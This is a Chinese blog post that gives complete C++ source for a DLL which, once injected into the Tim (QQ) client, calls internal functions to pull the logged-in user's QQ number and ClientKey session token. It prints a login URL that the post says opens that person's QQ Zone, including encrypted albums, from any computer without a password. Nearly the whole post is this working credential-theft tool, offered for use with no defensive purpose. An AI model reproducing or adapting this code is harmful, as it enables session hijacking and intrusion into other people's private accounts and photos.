窃取ClientKey

最新推荐文章于 2024-09-05 22:59:17 发布

FFE4

最新推荐文章于 2024-09-05 22:59:17 发布

阅读量1.3k

点赞数

分类专栏：心情杂货铺

本文链接：https://blog.csdn.net/cssxn/article/details/103788209

版权

心情杂货铺专栏收录该内容

47 篇文章 4 订阅

订阅专栏

编译好DLL，直接注入Tim.exe，使用dbgView等工具查看输出的url，复制到任何一台电脑，使用浏览器打开这个url，就可以不需要密码进入某人的空间，查看加密相册等~

DLL源码：

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <stdio.h>
#include <WTypes.h>

//定义CTXStringW为BSTR
typedef BSTR CTXStringW;

CTXStringW AllocTXString(const wchar_t* lpSrc)
{
    if (lpSrc == NULL) return NULL;
    BYTE* bBuffer = new BYTE[16 + (wcslen(lpSrc) + 1) * 2];
    if (bBuffer == NULL) return NULL;
    DWORD dwZero = 0;
    DWORD dwCount = 3;
    DWORD dwLenth = wcslen(lpSrc) + 1;
    memmove(bBuffer + 0 * 4, &dwZero, 4);
    memmove(bBuffer + 1 * 4, &dwCount, 4);
    memmove(bBuffer + 2 * 4, &dwLenth, 4);
    memmove(bBuffer + 3 * 4, &dwLenth, 4);
    wcscpy((wchar_t*)(bBuffer + 4 * 4), lpSrc);
    return CTXStringW(bBuffer + 16);
}

VOID Steal()
{
    do {

        HMODULE hKernelUtil = GetModuleHandle(L"KernelUtil.dll");
        if (hKernelUtil == NULL)
        {
            OutputDebugStringA("Get KernelUtil Module failed \n");
            break;
        }

        PVOID PtrGetSelfUin = GetProcAddress(hKernelUtil, "?GetSelfUin@Contact@Util@@YAKXZ");
        if (PtrGetSelfUin == NULL)
        {
            OutputDebugStringA("Get GetSelfUin Function failed \n");
            break;
        }

        DWORD uin = ((int(*)(int))PtrGetSelfUin)(1);
        if (uin == NULL)
        {
            OutputDebugStringA("Invoke GetSelfUin Function failed \n");
            break;
        }

        // Print QQ number
        char szUin[MAX_PATH] = { 0 };
        sprintf(szUin, "%d", uin);

        PVOID GetSignature = GetProcAddress(hKernelUtil, "?GetSignature@Misc@Util@@YA?AVCTXStringW@@PBD@Z");
        if (GetSignature == NULL)
        {
            OutputDebugStringA("Get GetSignature Function failed \n");
            break;
        }

        WCHAR wsBuffer[MAX_PATH] = { 0 };
        CTXStringW ClientKey = AllocTXString(wsBuffer);
        PVOID res = ((PVOID(*)(PVOID,const char*))GetSignature)(&ClientKey,"buf32ByteValueAddedSignature");
        if (res == NULL)
        {
            OutputDebugStringA("Invoke GetSignature Function failed \n");
            break;
        }

        // 复制下面链接，无需密码，进入QQ空间
        char msg[MAX_PATH] = { 0 };
        sprintf(msg, "https://ssl.ptlogin2.qq.com/jump?ptlang=2052&clientuin=%s&clientkey=%ws&u1=https://user.qzone.qq.com/%s%/infocenter&source=panelstar\n",szUin,ClientKey,szUin);
        OutputDebugStringA(msg);

    } while (0);
   


}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        Steal();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}